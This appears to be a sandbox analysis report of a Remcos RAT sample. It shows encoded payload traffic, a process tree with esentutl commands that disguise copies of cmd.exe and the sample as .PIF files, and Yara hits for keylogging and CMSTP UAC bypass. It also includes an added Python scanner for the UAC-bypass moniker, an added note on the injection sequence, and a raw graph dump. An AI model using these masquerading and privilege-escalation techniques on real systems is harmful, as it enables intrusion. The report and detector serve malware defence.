                                                        2024-09-25 07:34:36 UTC16384INData Raw: 30 73 43 38 76 4e 4c 4c 32 38 6e 53 30 4d 6e 57 79 63 75 38 32 74 54 4b 79 73 36 39 79 38 6e 61 32 4d 32 39 7a 38 48 55 7a 64 61 2b 79 63 33 55 31 4e 48 4d 31 4e 4b 2f 32 39 72 58 77 64 6e 59 7a 64 44 57 7a 39 4c 43 77 4c 2f 4a 32 73 48 62 7a 4d 76 41 32 64 58 42 31 63 33 56 31 64 76 56 79 39 6a 50 30 73 43 38 76 4e 4c 4c 32 38 6e 53 30 4d 6e 57 79 63 75 38 32 74 54 4b 79 73 36 39 79 38 6e 61 32 4d 32 39 7a 38 48 55 7a 64 61 2b 79 63 33 55 31 4e 48 4d 31 4e 4b 2f 32 39 72 58 77 64 6e 59 7a 64 44 57 7a 39 4c 43 77 4c 2f 4a 32 73 48 62 7a 4d 76 41 32 64 58 42 31 63 33 56 31 64 76 56 79 39 6a 50 30 73 43 38 76 4e 4c 4c 32 38 6e 53 30 4d 6e 57 79 63 75 38 32 74 54 4b 79 73 36 39 79 38 6e 61 32 4d 32 39 7a 38 48 55 7a 64 61 2b 79 63 33 55 31 4e 48 4d 31 4e 4b
                                                        Data Ascii: 0sC8vNLL28nS0MnWycu82tTKys69y8na2M29z8HUzda+yc3U1NHM1NK/29rXwdnYzdDWz9LCwL/J2sHbzMvA2dXB1c3V1dvVy9jP0sC8vNLL28nS0MnWycu82tTKys69y8na2M29z8HUzda+yc3U1NHM1NK/29rXwdnYzdDWz9LCwL/J2sHbzMvA2dXB1c3V1dvVy9jP0sC8vNLL28nS0MnWycu82tTKys69y8na2M29z8HUzda+yc3U1NHM1NK
                                                        2024-09-25 07:34:36 UTC16384INData Raw: 51 30 63 7a 2b 4f 7a 33 4e 50 6f 77 51 74 68 42 50 6a 54 68 45 52 38 58 4a 45 44 53 30 45 42 43 4e 65 33 38 4c 64 35 48 4e 71 2b 39 73 73 6e 61 47 55 51 78 52 44 48 68 4f 45 49 77 4c 6a 67 39 50 7a 37 4d 39 4e 4b 2f 4d 6b 46 48 4f 6b 6e 64 4f 45 52 49 53 44 55 33 4d 7a 44 4a 2b 38 45 38 36 44 6f 73 48 45 6b 61 51 75 6f 32 33 64 76 2b 79 39 67 39 51 66 56 48 4d 69 73 73 33 45 72 71 30 49 7a 57 4f 53 77 34 4e 30 45 4f 2f 44 77 2b 4f 53 35 49 75 55 45 57 53 50 59 31 35 64 5a 4c 79 54 31 42 51 44 4a 4a 4a 45 50 38 4f 45 70 41 4d 55 64 47 4f 6a 34 66 53 4f 55 2f 2b 4c 2b 50 32 73 46 44 53 54 6b 50 52 52 34 32 34 69 37 64 31 51 76 56 37 6b 6f 73 35 30 4d 79 46 55 50 73 4f 50 48 53 68 4d 6c 45 4c 76 77 36 33 42 59 75 4c 67 38 78 46 43 37 64 4f 65 57 39 43 63 46
                                                        Data Ascii: Q0cz+Oz3NPowQthBPjThER8XJEDS0EBCNe38Ld5HNq+9ssnaGUQxRDHhOEIwLjg9Pz7M9NK/MkFHOkndOERISDU3MzDJ+8E86DosHEkaQuo23dv+y9g9QfVHMiss3Erq0IzWOSw4N0EO/Dw+OS5IuUEWSPY15dZLyT1BQDJJJEP8OEpAMUdGOj4fSOU/+L+P2sFDSTkPRR424i7d1QvV7kos50MyFUPsOPHShMlELvw63BYuLg8xFC7dOeW9CcF
                                                        2024-09-25 07:34:36 UTC16384INData Raw: 7a 39 4c 43 46 6d 73 33 32 68 56 76 52 4d 76 41 32 64 54 42 31 63 33 56 31 64 76 56 79 39 67 72 64 6b 69 38 47 36 36 54 32 38 6e 53 30 4d 6e 57 79 63 75 38 32 74 54 4b 79 6c 74 70 75 38 6e 61 32 42 4f 39 7a 38 48 55 30 74 6e 42 78 73 33 55 31 4e 48 4d 31 4e 4b 2f 32 78 32 74 73 64 6e 59 7a 64 44 57 4b 33 62 6c 77 42 74 64 75 73 48 62 7a 4d 72 41 32 64 58 42 31 63 33 56 31 64 73 68 58 36 6a 50 4a 61 71 73 76 4e 4c 4c 32 38 6e 53 30 4d 6e 57 79 63 75 38 32 76 76 4b 79 73 36 39 79 38 6e 61 48 51 7a 65 7a 78 69 35 74 64 59 5a 4e 36 58 55 49 7a 2f 4d 31 4e 4b 2b 32 39 72 58 77 64 6e 59 7a 64 44 57 7a 39 4c 43 77 4c 38 4f 41 4d 48 62 7a 4d 75 72 32 53 46 6f 56 4d 30 6b 70 61 66 56 79 39 6a 50 30 73 43 38 76 4e 4c 4c 32 38 6e 53 30 4d 6e 57 79 63 75 38 32 74 54
                                                        Data Ascii: z9LCFms32hVvRMvA2dTB1c3V1dvVy9grdki8G66T28nS0MnWycu82tTKyltpu8na2BO9z8HU0tnBxs3U1NHM1NK/2x2tsdnYzdDWK3blwBtdusHbzMrA2dXB1c3V1dshX6jPJaqsvNLL28nS0MnWycu82vvKys69y8naHQzezxi5tdYZN6XUIz/M1NK+29rXwdnYzdDWz9LCwL8OAMHbzMur2SFoVM0kpafVy9jP0sC8vNLL28nS0MnWycu82tT
                                                        2024-09-25 07:34:36 UTC16384INData Raw: 31 4e 4b 2f 32 39 72 58 77 64 6e 59 7a 64 44 57 7a 39 4c 43 77 4c 2f 4a 32 73 48 62 7a 4d 76 41 32 52 67 56 49 53 6b 68 49 52 38 55 44 78 34 72 4b 42 59 61 47 69 67 50 48 77 30 6f 4a 67 30 6b 44 51 38 61 49 43 49 51 45 46 73 5a 44 77 30 67 48 69 6b 5a 4b 78 58 55 7a 64 61 2b 79 63 33 55 31 4e 48 4d 31 4e 4b 2f 32 39 72 58 77 64 6e 59 7a 64 44 57 7a 39 4c 43 77 4c 2f 4a 32 73 48 62 7a 4d 76 41 32 64 58 42 31 63 33 56 31 64 76 56 79 39 6a 50 30 73 43 38 76 4e 4c 4c 32 38 6e 53 30 4d 6e 57 79 63 75 38 32 74 54 4b 79 73 36 39 79 38 6e 61 32 4d 32 39 7a 38 48 55 7a 64 61 2b 79 63 33 55 31 4e 48 4d 31 4e 4b 2f 32 39 72 58 77 64 6b 65 4b 53 59 6b 4b 79 67 59 4a 78 73 4e 49 42 55 66 4b 67 38 57 48 53 45 56 49 53 6b 68 49 52 38 68 44 78 34 72 4b 42 59 61 47 69 67
                                                        Data Ascii: 1NK/29rXwdnYzdDWz9LCwL/J2sHbzMvA2RgVISkhIR8UDx4rKBYaGigPHw0oJg0kDQ8aICIQEFsZDw0gHikZKxXUzda+yc3U1NHM1NK/29rXwdnYzdDWz9LCwL/J2sHbzMvA2dXB1c3V1dvVy9jP0sC8vNLL28nS0MnWycu82tTKys69y8na2M29z8HUzda+yc3U1NHM1NK/29rXwdkeKSYkKygYJxsNIBUfKg8WHSEVISkhIR8hDx4rKBYaGig
                                                        2024-09-25 07:34:36 UTC16384INData Raw: 7a 2f 58 55 51 64 59 7a 79 55 72 55 50 64 48 4d 31 4e 4b 2f 4e 64 70 44 77 54 37 59 50 64 42 46 7a 7a 37 43 4d 4c 2f 77 32 68 62 62 72 4d 76 31 32 55 4c 42 53 63 31 46 31 54 7a 56 37 74 67 2f 30 68 6d 38 51 4e 4c 6a 32 78 33 53 47 4d 6e 66 79 64 79 38 33 74 54 38 79 6b 4b 39 4d 4d 6b 67 32 4b 32 39 51 4d 45 31 7a 55 53 2b 4d 4d 31 44 31 45 48 4d 74 64 4a 42 32 78 54 58 4a 4e 6e 59 7a 66 44 57 51 55 4d 32 77 4c 2f 4a 53 44 44 65 4c 54 66 31 33 54 34 74 50 6b 49 2f 46 74 76 56 71 78 4a 42 51 2f 63 35 47 4c 4c 76 33 79 35 46 51 79 72 57 79 63 75 38 53 45 48 75 4f 38 36 39 79 38 6b 2b 50 65 59 32 51 55 49 39 36 44 73 77 4d 71 33 68 53 6b 5a 44 46 62 4c 37 53 6a 31 49 4e 72 72 59 53 6b 4e 49 53 45 55 33 4c 4c 38 78 52 42 72 62 7a 43 6c 48 32 64 56 49 2b 63 31
                                                        Data Ascii: z/XUQdYzyUrUPdHM1NK/NdpDwT7YPdBFzz7CML/w2hbbrMv12ULBSc1F1TzV7tg/0hm8QNLj2x3SGMnfydy83tT8ykK9MMkg2K29QME1zUS+MM1D1EHMtdJB2xTXJNnYzfDWQUM2wL/JSDDeLTf13T4tPkI/FtvVqxJBQ/c5GLLv3y5FQyrWycu8SEHuO869y8k+PeY2QUI96DswMq3hSkZDFbL7Sj1INrrYSkNISEU3LL8xRBrbzClH2dVI+c1

                                                        Target ID:0
                                                        Start time:03:34:32
                                                        Start date:25/09/2024
                                                        Path:C:\Users\user\Desktop\XjPA2pnUhC.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\XjPA2pnUhC.exe"
                                                        Imagebase:0x400000
                                                        File size:1'088'512 bytes
                                                        MD5 hash:BBF710C83246092A538128620853D4FD
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:Borland Delphi
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.2129313765.000000007E9D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.2129313765.000000007E9D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2129313765.000000007E9D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.2129313765.000000007E9D0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:2
                                                        Start time:03:34:38
                                                        Start date:25/09/2024
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\ahhbgzzQ.cmd" "
                                                        Imagebase:0x790000
                                                        File size:236'544 bytes
                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:3
                                                        Start time:03:34:38
                                                        Start date:25/09/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6d64d0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:4
                                                        Start time:03:34:39
                                                        Start date:25/09/2024
                                                        Path:C:\Windows\SysWOW64\esentutl.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                                                        Imagebase:0xc40000
                                                        File size:352'768 bytes
                                                        MD5 hash:5F5105050FBE68E930486635C5557F84
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:5
                                                        Start time:03:34:40
                                                        Start date:25/09/2024
                                                        Path:C:\Windows\SysWOW64\esentutl.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\XjPA2pnUhC.exe /d C:\\Users\\Public\\Libraries\\Qzzgbhha.PIF /o
                                                        Imagebase:0xc40000
                                                        File size:352'768 bytes
                                                        MD5 hash:5F5105050FBE68E930486635C5557F84
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:6
                                                        Start time:03:34:40
                                                        Start date:25/09/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6d64d0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:7
                                                        Start time:03:34:40
                                                        Start date:25/09/2024
                                                        Path:C:\Windows\SysWOW64\colorcpl.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\System32\colorcpl.exe
                                                        Imagebase:0xf70000
                                                        File size:86'528 bytes
                                                        MD5 hash:DB71E132EBF1FEB6E93E8A2A0F0C903D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.4510115069.0000000000791000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.4510318610.0000000000CFF000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.4510115069.0000000000728000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                        Reputation:moderate
                                                        Has exited:false

                                                        Target ID:9
                                                        Start time:03:34:50
                                                        Start date:25/09/2024
                                                        Path:C:\Users\Public\Libraries\Qzzgbhha.PIF
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\Public\Libraries\Qzzgbhha.PIF"
                                                        Imagebase:0x400000
                                                        File size:1'088'512 bytes
                                                        MD5 hash:BBF710C83246092A538128620853D4FD
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:Borland Delphi
                                                        Antivirus matches:
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 32%, ReversingLabs
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:10
                                                        Start time:03:34:51
                                                        Start date:25/09/2024
                                                        Path:C:\Windows\SysWOW64\SndVol.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\System32\SndVol.exe
                                                        Imagebase:0x260000
                                                        File size:226'712 bytes
                                                        MD5 hash:BD4A1CC3429ED1251E5185A72501839B
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.2251996048.000000001F0E7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000002.2228243300.0000000002880000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.2228243300.0000000002880000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000A.00000002.2228243300.0000000002880000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000A.00000002.2228243300.0000000002880000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000A.00000002.2228243300.0000000002880000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000A.00000002.2228243300.0000000002880000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:11
                                                        Start time:03:34:58
                                                        Start date:25/09/2024
                                                        Path:C:\Users\Public\Libraries\Qzzgbhha.PIF
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\Public\Libraries\Qzzgbhha.PIF"
                                                        Imagebase:0x400000
                                                        File size:1'088'512 bytes
                                                        MD5 hash:BBF710C83246092A538128620853D4FD
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:Borland Delphi
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:12
                                                        Start time:03:34:59
                                                        Start date:25/09/2024
                                                        Path:C:\Windows\SysWOW64\SndVol.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\System32\SndVol.exe
                                                        Imagebase:0x260000
                                                        File size:226'712 bytes
                                                        MD5 hash:BD4A1CC3429ED1251E5185A72501839B
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000C.00000002.2306880653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.2306880653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.2306880653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000C.00000002.2306880653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000C.00000002.2306880653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000C.00000002.2306880653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.2330151215.000000002B797000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:moderate
                                                        Has exited:true
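Two of the Yara matches listed for this process (JoeSecurity_UACBypassusingCMSTP and ditekSHen's INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, T1218.003) fire on the same memory dump. The script below is an added example, not the logic of either rule and not code from the report or from the sample: it scans a raw memory dump for the indicator that CMSTP COM elevation abuse leaves behind, the CMSTPLUA class CLSID {3E5FC7F9-9A51-4367-9063-A120244FBEC7} and the "Elevation:Administrator!new:" moniker built on it. That this is what the two rules key on is an assumption; that a Joe Sandbox .sdmp file can be read as raw bytes is also an assumption. The embedded sample buffer is constructed for the demonstration and is not data from the analysed dump.

```python
import re
from typing import List, Tuple

# Public CLSID of the CMSTPLUA COM class whose ICMLuaUtil interface is abused
# for the auto-elevating UAC bypass (MITRE T1218.003).
CMSTPLUA_CLSID = "{3E5FC7F9-9A51-4367-9063-A120244FBEC7}"
# The elevation moniker a caller hands to CoGetObject to obtain an elevated instance.
ELEVATION_MONIKER = "Elevation:Administrator!new:" + CMSTPLUA_CLSID


def _both_encodings(text: str) -> dict:
    """Compile a case-insensitive byte pattern for the ASCII and the UTF-16LE
    form of `text`; a process dump may hold the string in either width."""
    return {
        "ascii": re.compile(re.escape(text.encode("ascii")), re.IGNORECASE),
        "utf16le": re.compile(re.escape(text.encode("utf-16-le")), re.IGNORECASE),
    }


# Assumption: these two strings are the indicators the CMSTP UAC-bypass rules look for.
INDICATORS = {
    "cmstplua_moniker": _both_encodings(ELEVATION_MONIKER),
    "cmstplua_clsid": _both_encodings(CMSTPLUA_CLSID),
}


def scan_dump(data: bytes) -> List[Tuple[str, str, int]]:
    """Return (indicator, encoding, offset) for every hit, ordered by offset."""
    hits = []
    for name, patterns in INDICATORS.items():
        for enc, pat in patterns.items():
            for m in pat.finditer(data):
                hits.append((name, enc, m.start()))
    return sorted(hits, key=lambda h: (h[2], h[0]))


def has_cmstp_bypass_indicator(data: bytes) -> bool:
    """True only when the full elevation moniker is present; a bare CLSID hit is
    weaker evidence on its own and is reported but not treated as a verdict."""
    return any(name == "cmstplua_moniker" for name, _, _ in scan_dump(data))


def scan_file(path: str) -> List[Tuple[str, str, int]]:
    """Scan a memory dump on disk (assumed to be raw bytes, e.g. a Joe Sandbox .sdmp)."""
    with open(path, "rb") as fh:
        return scan_dump(fh.read())


# Constructed stand-in for a memory dump: padding, a fake header, then the
# moniker as a wide string at offset 96. Not bytes from the analysed sample.
SAMPLE_DUMP = (
    b"\x00" * 64
    + b"MZ" + b"\x00" * 30
    + ELEVATION_MONIKER.encode("utf-16-le")
    + b"\x00" * 16
)

if __name__ == "__main__":
    for name, enc, off in scan_dump(SAMPLE_DUMP):
        print(f"{name:18} {enc:8} @0x{off:x}")
    print("UAC bypass indicator:", has_cmstp_bypass_indicator(SAMPLE_DUMP))
```

Run it against the sample buffer and it reports the moniker at 0x60 and, inside it, the CLSID at 0x98; point `scan_file` at a dump to triage a real process region. Matching both widths matters because the moniker is normally passed to CoGetObject as a wide string, while a packed configuration may store it narrow.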


                                                          Execution Graph

                                                          Execution Coverage:6.6%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:5.2%
                                                          Total number of Nodes:1555
                                                          Total number of Limit Nodes:15
                                                          execution_graph: rendered on the original page as an interactive graph (1555 nodes, 15 limit nodes); its raw node and edge list is not reproduced here. Windows API calls resolved at graph nodes, in the order they appear in the graph:
                                                          • 29088b8, 290894c: LoadLibraryW; 29082bb: GetModuleHandleW, GetProcAddress (twice); 2908973: GetProcAddress; 2908204, 2908215: GetModuleHandleA; 2907e0c, 29083c1, 29089b0: FreeLibrary
                                                          • 28f2ee0: QueryPerformanceCounter, GetTickCount
                                                          • 290f800: InetIsOffline
                                                          • 28fbabc: CharNextA
                                                          • 28f4c3c, 28f4f26: SysAllocStringLen; 28f4c56, 28f4c66: SysFreeString
                                                          • 2907dd3: NtWriteVirtualMemory
                                                          • 2908393: FlushInstructionCache
                                                          • 290dcca: RtlDosPathNameToNtPathName_U; 290dce6: NtCreateFile; 290dd23: NtWriteFile, NtClose
                                                          • 29087e3, 29186e0: CreateProcessAsUserW
                                                          • 2918d2d: ResumeThread
                                                          • 290ed69: WaitForSingleObject, CloseHandle (twice); 2918eac: CloseHandle
                                                          • 28f1684, 28f15d4: VirtualAlloc; 28f16f5, 28f1c00: VirtualFree
                                                          • Sleep at 2914272 and 290dd5d, and in the retry loops around 28f1d79 .. 28f1fc1 (helpers 28f1724 and 28f1a8c)
                                                          • Sub-graphs summarised by the report only as a call count: 290adf8 (29 API calls), 2905aec (42), 2907e50 (17), 2908d70 (31), 290b118 (39)
                                                          Read together, CreateProcessAsUserW followed by NtWriteVirtualMemory, FlushInstructionCache and ResumeThread is the create, write, resume shape of process injection; no APC-queuing API is resolved in this graph excerpt, and the NtCreateFile / NtWriteFile / NtClose node is a file drop that precedes it.
76973->76974 76976 28f4860 11 API calls 76974->76976 76977 29089d0 20 API calls 76975->76977 76978 2918ed8 76976->76978 76979 291a447 76977->76979 76980 28f47ec 11 API calls 76978->76980 76981 29089d0 20 API calls 76979->76981 76982 2918f0f 76980->76982 76983 291a47a 76981->76983 76984 29089d0 20 API calls 76982->76984 76986 29089d0 20 API calls 76983->76986 76985 2918f33 76984->76985 76987 28f4860 11 API calls 76985->76987 76989 291a4ad 76986->76989 76988 2918f54 76987->76988 76991 28f47ec 11 API calls 76988->76991 76990 29089d0 20 API calls 76989->76990 76992 291a4e0 76990->76992 76993 2918f8b 76991->76993 76994 29089d0 20 API calls 76992->76994 76995 29089d0 20 API calls 76993->76995 76996 291a513 76994->76996 76997 2918faf 76995->76997 76998 28f4860 11 API calls 76996->76998 76999 28f4860 11 API calls 76997->76999 77000 291a534 76998->77000 77001 2918fd0 76999->77001 77003 28f47ec 11 API calls 77000->77003 77002 28f47ec 11 API calls 77001->77002 77005 2919007 77002->77005 77004 291a56b 77003->77004 77006 29089d0 20 API calls 77004->77006 77007 29089d0 20 API calls 77005->77007 77008 291a58f 77006->77008 77009 291902b 77007->77009 77010 28f4860 11 API calls 77008->77010 77011 28f4860 11 API calls 77009->77011 77012 291a5b0 77010->77012 77013 291904c 77011->77013 77014 28f47ec 11 API calls 77012->77014 77015 28f47ec 11 API calls 77013->77015 77016 291a5e7 77014->77016 77017 2919083 77015->77017 77018 29089d0 20 API calls 77016->77018 77019 29089d0 20 API calls 77017->77019 77022 291a60b 77018->77022 77020 29190a7 77019->77020 77021 28f4860 11 API calls 77020->77021 77024 29190c8 77021->77024 77023 29089d0 20 API calls 77022->77023 77026 291a63e 77023->77026 77025 28f47ec 11 API calls 77024->77025 77027 29190ff 77025->77027 77028 29089d0 20 API calls 77026->77028 77029 29089d0 20 API calls 77027->77029 77031 291a671 77028->77031 77030 2919123 77029->77030 77032 28f4860 11 API calls 77030->77032 77033 29089d0 20 API calls 77031->77033 77034 2919144 77032->77034 
77035 291a6a4 77033->77035 77036 28f47ec 11 API calls 77034->77036 77037 29089d0 20 API calls 77035->77037 77038 291917b 77036->77038 77040 291a6d7 77037->77040 77039 29089d0 20 API calls 77038->77039 77041 291919f 77039->77041 77042 29089d0 20 API calls 77040->77042 77043 28f4860 11 API calls 77041->77043 77044 291a70a 77042->77044 77046 29191c0 77043->77046 77045 28f4860 11 API calls 77044->77045 77047 291a72b 77045->77047 77048 28f47ec 11 API calls 77046->77048 77049 28f47ec 11 API calls 77047->77049 77050 29191f7 77048->77050 77051 291a762 77049->77051 77052 29089d0 20 API calls 77050->77052 77054 29089d0 20 API calls 77051->77054 77053 291921b 77052->77053 77057 290894c 21 API calls 77053->77057 77055 291a786 77054->77055 77056 28f4860 11 API calls 77055->77056 77061 291a7a7 77056->77061 77058 291923a 77057->77058 77059 290894c 21 API calls 77058->77059 77060 291924e 77059->77060 77062 290894c 21 API calls 77060->77062 77064 28f47ec 11 API calls 77061->77064 77063 2919262 77062->77063 77065 290894c 21 API calls 77063->77065 77069 291a7de 77064->77069 77066 2919276 77065->77066 77067 290894c 21 API calls 77066->77067 77068 291928a 77067->77068 77070 290894c 21 API calls 77068->77070 77072 29089d0 20 API calls 77069->77072 77071 291929e CloseHandle 77070->77071 77073 28f4860 11 API calls 77071->77073 77074 291a802 77072->77074 77076 29192ca 77073->77076 77075 28f4860 11 API calls 77074->77075 77077 291a823 77075->77077 77078 28f47ec 11 API calls 77076->77078 77079 28f47ec 11 API calls 77077->77079 77080 2919301 77078->77080 77081 291a85a 77079->77081 77082 29089d0 20 API calls 77080->77082 77084 29089d0 20 API calls 77081->77084 77083 2919325 77082->77083 77085 28f4860 11 API calls 77083->77085 77086 291a87e 77084->77086 77088 2919346 77085->77088 77087 28f4860 11 API calls 77086->77087 77089 291a89f 77087->77089 77090 28f47ec 11 API calls 77088->77090 77091 28f47ec 11 API calls 77089->77091 77092 291937d 77090->77092 77093 291a8d6 77091->77093 77094 29089d0 20 
